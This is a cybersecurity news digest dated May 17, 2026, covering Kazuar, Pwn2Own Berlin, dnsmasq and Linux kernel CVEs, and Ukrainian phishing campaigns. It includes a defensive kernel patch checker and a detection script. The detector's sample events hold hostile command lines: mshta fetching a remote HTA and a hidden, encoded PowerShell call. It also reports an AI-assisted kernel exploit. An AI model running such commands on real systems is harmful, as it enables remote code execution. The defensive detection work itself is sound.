The Lyceum: Cyber Intelligence Daily — May 17, 2026
Sunday, May 17, 2026
The Big Picture
Three things matter today, and they're all variations of the same theme: the floor keeps getting lower. Russia's Turla has rebuilt its Kazuar backdoor as a stealth peer-to-peer botnet — most infected machines never talk to the internet at all. Pwn2Own Berlin closed Saturday with 47 zero-days, $1,298,250 in payouts, and DEVCORE crowned Master of Pwn with $505,000 after chaining bugs through Edge, Exchange, and SharePoint. And the Linux kernel just shipped its fourth disclosed vulnerability in three weeks — this one hands any local user your SSH host keys.
The unifying signal: things we treated as hard problems — endpoint detection, hardware-tagged memory, kernel privilege boundaries — are absorbing real damage. Patch fast and assume less.
What Just Dropped
- CVE-2026-20182 — Cisco Catalyst SD-WAN Controller & Manager: authentication bypass, actively exploited, on CISA KEV with the federal remediation deadline expiring Sunday evening. Canada's Centre for Cyber Security issued AL26-012 urging immediate patching.
- CVE-2026-42897 — Microsoft Exchange Server (on-prem) OWA cross-site scripting: actively exploited via crafted email, CISA KEV due date 2026-05-29. Microsoft is pushing mitigations through Exchange Emergency Mitigation Service while a full patch is prepared.
- CVE-2026-42945 — NGINX ngx_http_rewrite_module: 18-year-old heap-based buffer overflow with public proof-of-concept now circulating; no NVD score yet. Russian outlet Xakep reports the PoC lowers the bar to remote code execution.
- CVE-2026-46333 "ssh-keysign-pwn" — Linux kernel ptrace exit-race: unprivileged local users can read SSH host keys and /etc/shadow. Patched kernels released May 15; working PoC published by researcher "_SiCk" hours after the fix.
- CVE-2026-46300 "Fragnesia" — Linux kernel XFRM ESP-in-TCP local root: public PoC available, distributions shipping fixes.
- Six dnsmasq CVEs — CVE-2026-2291, 4890, 4891, 4892, 4893, 5172 covering cache poisoning, memory disclosure, denial of service, and local root via DHCPv6. Fixed in dnsmasq 2.92rel2.
- Apache HertzBeat 1.8.0 unauthenticated RCE: working PoC on Exploit-DB targeting an input validation flaw in a web endpoint. Vendor has released 1.8.1/1.8.2; thousands of instances exposed on Shodan.
Today's Stories
Russia's Kazuar Backdoor Just Got a Lot Harder to Find
Your endpoint detection tools assume malware talks to the internet. Kazuar's new design specifically defeats that assumption, and Microsoft just published the blueprint.
Turla — which CISA assesses to be affiliated with Center 16 of Russia's FSB, and which Microsoft tracks as Secret Blizzard — has rebuilt its custom Kazuar backdoor as a modular peer-to-peer botnet engineered for long-term, near-invisible access. The architecture splits into three components (Kernel, Bridge, Worker) and elects a single "leader" host per cluster of compromised machines. Only the leader speaks to command-and-control infrastructure. Every other infected system operates in silent mode, passing data internally. In a network with a dozen infected machines, exactly one generates suspicious outbound traffic.
Per Microsoft's writeup, Kazuar now supports 150 configuration options governing security bypasses, scheduling, exfiltration chunk sizing, and process injection. Microsoft's threat intelligence places Turla's historical targets in government and diplomatic sectors across Europe and Central Asia, with notable piggybacking onto systems in Ukraine previously compromised by Aqua Blizzard (also known as Gamaredon).
What changes if this succeeds: signature-based detection becomes near-useless against this family, and internal-only command traffic shifts the economics of detection squarely onto the defender. What failure looks like: Microsoft's behavioral indicators get baked into EDR products quickly, and the leader-election pattern becomes a detection primitive rather than a stealth advantage. Watch whether your EDR vendor pushes Kazuar-specific behavioral rules within the next two weeks — that's the signal.
If you cleaned up a Gamaredon infection in the past two years, look again.
Pwn2Own Berlin Closes: 47 Zero-Days, $1,298,250, and a 90-Day Clock Starts Now
The world's most prestigious hacking competition wrapped Saturday, and the bill for Microsoft, VMware, and a dozen other vendors just came due. Per Zero Day Initiative's final results: $1,298,250 awarded for 47 unique zero-days across three days, with DEVCORE crowned Master of Pwn at 50.5 points and $505,000.
The story of the event is DEVCORE's Orange Tsai. On day one, he chained four logic bugs to escape Microsoft Edge's sandbox for $175,000. On day two, he chained three bugs into Microsoft Exchange to get remote code execution as SYSTEM for $200,000 — fully patched Exchange, falling to a chain that now starts a 90-day disclosure timer. STARLabs SG used memory corruption to exploit VMware ESXi with a cross-tenant code execution add-on for another $200,000 on day three.
The newer storyline is AI infrastructure. Researchers successfully attacked LiteLLM, NVIDIA Megatron Bridge, OpenAI Codex, Chroma, and LM Studio — the actual production tools companies are deploying to run AI workloads, all fully patched, all falling to chained exploits.
What changes if vendors patch quickly: the 47 zero-days become a coordinated cleanup. What failure looks like: Pwn2Own organizers reported the event hit capacity for the first time in its 19-year history, with researchers turned away — some of whom may drop bugs publicly rather than wait until next year. Watch security research social channels for uncoordinated PoC releases targeting products on the Berlin target list, and treat any Exchange server as a higher-priority patching target until Microsoft ships out-of-band fixes before mid-August.
Six CVEs in dnsmasq: The DNS Server in Your Router Needs a Patch
dnsmasq doesn't have a marketing team. It just quietly runs DNS and DHCP on hundreds of millions of devices — home routers, enterprise edge gear, Linux servers, Raspberry Pis — and it just got six vulnerabilities at once.
CERT/CC's VU#471747 documents the lot: CVE-2026-2291, 4890, 4891, 4892, 4893, and 5172. The collective impact spans denial of service, cache poisoning and silent redirection of users to attacker-controlled domains, memory disclosure, and a local privilege escalation path to root via DHCPv6 manipulation. DNS cache poisoning is the one to picture clearly: an attacker can make your device believe yourbank.com lives at an IP address they control. You type the right URL; you get the wrong website.
Per the oss-security disclosure, these are long-standing bugs that apply to essentially all non-ancient versions. Upstream maintainer Simon Kelley shipped 2.92rel2 to address them. In the Dnsmasq-discuss disclosure post, Kelley flagged something worth pausing on: there's been "something of a revolution in AI-based security research," and given how many bugs the good guys have surfaced, there's "no doubt" the bad guys have done the same.
What changes if router vendors patch quickly: mostly invisible plumbing fix, nobody notices. What failure looks like: vendor firmware updates lag months while embedded devices in homes and small offices sit exposed. If your router vendor hasn't shipped a firmware update within 2-4 weeks, assume it's still vulnerable and consider blocking DNS manipulation at the network perimeter.
CVE-2026-46333: A Six-Year-Old ptrace Race Hands Any Local User Your SSH Host Keys
On May 14, Qualys's Threat Research Unit disclosed CVE-2026-46333, dubbed "ssh-keysign-pwn" — a Linux kernel logic flaw letting any unprivileged local user read root-owned files including SSH host private keys and /etc/shadow. Hours after the upstream fix landed, researcher _SiCk published two working exploits: one that reads /etc/ssh/ssh_host_*_key via ssh-keysign, one that reads /etc/shadow via chage -l. Per AlmaLinux's writeup, the mechanism is a ptrace exit-race: between detaching a task's memory descriptor and closing its file descriptor table, the kernel skips its dumpable safeguard, and an unprivileged process can call pidfd_getfd(2) to copy descriptors out of an exiting privileged process.
Most coverage is getting one thing wrong: the mitigations from the previous three Linux kernel vulnerabilities this month — Copy Fail, Dirty Frag, Fragnesia — do not apply here. Those were addressed by blacklisting esp4, esp6, algif_aead, and related modules. CVE-2026-46333 uses none of those code paths. A server with all three previous mitigations applied is still fully exposed.
Per 9to5Linux, patched kernels are available as of May 15: 7.0.8, 6.18.31, 6.12.89, 6.6.139, 6.1.173, 5.15.207, and 5.10.256.
What changes if you patch immediately: key rotation hassle, then back to normal. What failure looks like: because this is an information disclosure bug that has been present for six years, treat SSH host keys and /etc/shadow as potentially compromised on any internet-reachable server that allowed shell access for untrusted users before the fix was applied. The observable signal that this is being exploited at scale will be a wave of stolen-credential intrusions over the coming weeks. Update, reboot, rotate.
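A fleet triage helper for the "update" step, added here as an example rather than code from the article, Qualys, or kernel.org: it parses a `uname -r` string and compares it against the seven fixed stable releases the article quotes from 9to5Linux. The branch-matching logic, the release-candidate handling and the sample version strings are my own. One caveat the script encodes deliberately: distribution kernels (RHEL, Ubuntu, Debian and the like) backport fixes without bumping the upstream version number, so a "vulnerable" result on a vendor kernel means "check the vendor advisory", not "exploitable"; and any branch not on the list is reported as unknown rather than guessed.

```python
"""Compare a running kernel's version against the stable releases that
carry the CVE-2026-46333 fix.

Added example. FIXED is the list quoted in the article (9to5Linux, May 15);
everything else here is an assumption of this example, not a published tool.
"""
import platform
import re

# Minimum fixed release per stable branch, per the article. The trailing 1
# marks a final release; release candidates sort below it (see parse_release).
FIXED = {
    (7, 0): (7, 0, 8, 1),
    (6, 18): (6, 18, 31, 1),
    (6, 12): (6, 12, 89, 1),
    (6, 6): (6, 6, 139, 1),
    (6, 1): (6, 1, 173, 1),
    (5, 15): (5, 15, 207, 1),
    (5, 10): (5, 10, 256, 1),
}

_VER_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")
_RC_RE = re.compile(r"^\d+\.\d+(?:\.\d+)?-rc\d+")


def parse_release(release: str) -> tuple[int, int, int, int]:
    """Turn a uname -r string such as '6.12.88-generic' or '6.6.139-rc1'
    into (major, minor, patch, final). A missing patch number means 0;
    final is 0 for -rcN kernels so they compare below the real release."""
    m = _VER_RE.match(release)
    if not m:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    major, minor, patch = m.groups()
    is_rc = bool(_RC_RE.match(release))
    return int(major), int(minor), int(patch or 0), 0 if is_rc else 1


def patch_status(release: str) -> str:
    """Return 'fixed', 'vulnerable' or 'unknown-branch'.

    'unknown-branch' covers mainline and EOL branches not on the list and
    anything newer than the newest listed branch; the script does not guess
    about those, and it cannot see distro backports at all."""
    major, minor, patch, final = parse_release(release)
    fixed = FIXED.get((major, minor))
    if fixed is None:
        return "unknown-branch"
    return "fixed" if (major, minor, patch, final) >= fixed else "vulnerable"


if __name__ == "__main__":
    # Constructed sample strings, then the kernel this script is running on.
    for sample in ("6.12.88-generic", "6.12.89", "5.10.256-rc1", "6.14.0"):
        print(f"{sample:<18} {patch_status(sample)}")
    running = platform.release()
    print(f"{running:<18} {patch_status(running)}")
```

Run it from a configuration-management job or an SSH loop over the fleet and act on "vulnerable" and "unknown-branch" hosts first; the "rotate" step (new SSH host keys, forced password changes) still applies to every host that was exposed before the reboot, whatever the script says afterwards.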
⚡ What Most People Missed
- Cisco SD-WAN attribution and post-compromise indicators: In addition to being on CISA's KEV, Cisco has attributed active exploitation to a cluster it tracks as UAT-8616. Observed post-compromise actions include SSH key additions and NETCONF modifications; if your controllers were internet-reachable before patching, prioritize forensic review for those indicators and assume potential compromise.
- Calif used Claude Mythos to bypass Apple's M5 Memory Integrity Enforcement in five days: Researchers at Palo Alto-based Calif disclosed the first public macOS kernel exploit on M5 hardware with MIE enabled, working around the hardware-tagged memory checks via a data-only attack chain. Apple has not patched; Calif met with Apple at Apple Park earlier this week to share a 55-page report and will publish full technical details only after fixes ship. The strategic implication — frontier AI compressing months of kernel research into five days — matters more than the bug itself.
- Canvas extortion is now defacement: Per BleepingComputer, the ShinyHunters campaign against Instructure escalated from data theft into the defacement of roughly 330 school login portals. The trust and data-integrity questions outlive any uptime recovery.
From the Foreign Press
Russian-language coverage reports public exploit code for YellowKey and GreenPlasma Windows zero-days
Xakep reports that researcher "Chaotic Eclipse" (also known as Nightmare-Eclipse) has published exploit code for two unpatched Windows zero-days: YellowKey, a BitLocker bypass affecting Windows 11 and Windows Server 2022/2025 that abuses Windows Recovery Environment behavior via USB, and GreenPlasma, a local privilege escalation to SYSTEM. The article cites independent confirmation from named researcher Will Dormann that the USB-based YellowKey attack works as described. Public PoC plus third-party validation changes the temperature for any environment that treats BitLocker as the final word on a lost or seized laptop. No Microsoft advisory or mitigation guidance has surfaced yet. Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.
CERT-UA: UAC-0265 hitting Ukrainian energy and logistics
A CERT-UA bulletin describes spearphishing with password-protected ZIPs dropping LNK and JS files that invoke powershell.exe and mshta.exe, paired with a lightweight backdoor that beacons via Telegram and public cloud storage. Same Living-off-the-Land pattern as the UAC-0247 hospital campaign last week — Telegram-as-C2 is the throughline. Source: CERT-UA — Ukrainian. No English-language coverage confirmed at time of publication.
CERT-UA: UAC-0247 cluster targeting hospitals, local government, and FPV drone operators
CERT-UA's writeup of the UAC-0247 cluster (also tracked as UAC-0244) describes a campaign that simultaneously targets Ukrainian hospitals, local government bodies, and operators of FPV drones — a sector combination consistent with Russian intelligence priorities, though CERT-UA stops short of formal attribution. Defensive recommendations include restricting LNK, HTA, and JS execution on endpoints and limiting mshta.exe, powershell.exe, and wscript.exe. Source: CERT-UA — Ukrainian. No English-language coverage confirmed at time of publication.
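For teams that cannot block the three interpreters outright, a detection pass over process-creation telemetry is the next best thing. The following is an added example, not a rule published by CERT-UA or anything from the bulletins: it scores Sysmon-style process-creation events (field names Image, ParentImage, CommandLine follow Sysmon Event ID 1; adapt them to your EDR's schema) for the chain the two bulletins describe, a script file from a mailed archive launched through the shell into powershell.exe, mshta.exe or wscript.exe. The heuristics (explorer.exe as parent plus a script-file argument, a user-writable staging directory, mshta pulling a remote HTA, and the general hidden-window/encoded-command check) and the five sample events are my own constructions.

```python
"""Score process-creation events for the LNK/JS -> interpreter chain the
CERT-UA UAC-0265 and UAC-0247 bulletins describe.

Added example; the events and heuristics are constructed for illustration.
"""
import re
from pathlib import PureWindowsPath

# Interpreters the bulletin recommends restricting.
INTERPRETERS = {"mshta.exe", "powershell.exe", "wscript.exe"}

# Heuristics (assumptions of this example, not CERT-UA indicators).
SCRIPT_EXT = re.compile(r"\.(?:js|jse|hta|lnk|vbs)\b", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(?:Temp|Downloads)\\", re.IGNORECASE)
URL = re.compile(r"https?://", re.IGNORECASE)
HIDDEN_OR_ENCODED = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|e(?:nc|ncodedcommand)?\s)", re.IGNORECASE
)

# Constructed sample telemetry: three events modelled on the bulletin's
# chain, one benign admin script, one unrelated program.
EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" '
                    r'"C:\Users\olena\AppData\Local\Temp\7zO4C1\invoice.js"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe https://example.invalid/update.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -w hidden -nop -enc SQBFAFgA"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"Image": r"C:\Program Files\Notepad++\notepad++.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"notepad++.exe" C:\Users\olena\Downloads\notes.txt'},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, works on any host OS."""
    return PureWindowsPath(path).name.lower()


def score(event: dict) -> list[str]:
    """Return the reasons an event matches the chain; an empty list is benign."""
    reasons: list[str] = []
    if basename(event["Image"]) not in INTERPRETERS:
        return reasons
    parent = basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    if parent == "explorer.exe" and SCRIPT_EXT.search(cmd):
        reasons.append("script file launched from the shell (LNK/JS/HTA double-click)")
    if USER_WRITABLE.search(cmd):
        reasons.append("payload path in a user-writable staging directory")
    if basename(event["Image"]) == "mshta.exe" and URL.search(cmd):
        reasons.append("mshta fetching a remote HTA")
    if HIDDEN_OR_ENCODED.search(cmd):
        reasons.append("hidden window or encoded command (general LOTL heuristic)")
    return reasons


def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Indices and reasons for every event that scored at least one reason."""
    return [(i, score(e)) for i, e in enumerate(events) if score(e)]


if __name__ == "__main__":
    for idx, reasons in triage(EVENTS):
        print(f"event {idx}: {basename(EVENTS[idx]['Image'])}")
        for r in reasons:
            print(f"    - {r}")
```

Events 0 to 2 are flagged and 3 and 4 are not; in production the same scoring feeds a SIEM correlation rule, and the reasons list is what the analyst sees. Tune USER_WRITABLE to the archive tools your users actually run (7-Zip's temporary 7zO* directories are one common extraction location) and expect the hidden/encoded check to fire on legitimate software deployment scripts until you allow-list them.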
📅 What to Watch
- If Microsoft ships out-of-band patches for Exchange before mid-August, it confirms DEVCORE's Pwn2Own chain is being weaponized faster than the 90-day window — and your maintenance windows just shrank.
- If your EDR vendor pushes Kazuar behavioral detection rules within two weeks, the leader-election trick stops being a stealth advantage; if they don't, assume Turla has a meaningful window of operational invisibility in your environment.
- If Korean regulators move from MSP advisories to binding MFA and access-audit requirements after the KillDisk cluster, expect other countries to copy the rule and reshape MSP contracting globally.
- If router vendors haven't shipped patched dnsmasq firmware within 2-4 weeks, the long tail of unpatched home and small-office devices becomes the new DNS-poisoning attack surface for the next decade.
- If Apple ships a hardware or microcode update for M5 MIE rather than a software patch, it tells you Calif's bypass is structural to MIE's design rather than a fixable software-level escape — and that's a much bigger story.
- If a second Calif-style "AI compressed months of kernel work into a week" disclosure lands within 60 days, the question for platform security teams shifts from whether AI changes their threat model to how fast.
The Closer
A Russian backdoor that whispers instead of dials home, an 18-year-old NGINX bug found by a chatbot, and Orange Tsai walking out of Berlin $375,000 richer with a SYSTEM shell on a fully patched Exchange server. Somewhere in Cupertino, an engineer is reading 55 pages explaining how the chip they spent five years tagging got bypassed by a piece of software that's been out of preview for two months.
Patch what you can, rotate what you must, sleep when you can.
If you know someone running on-prem Exchange or a Linux fleet, forward this — they'll want the 24 hours back.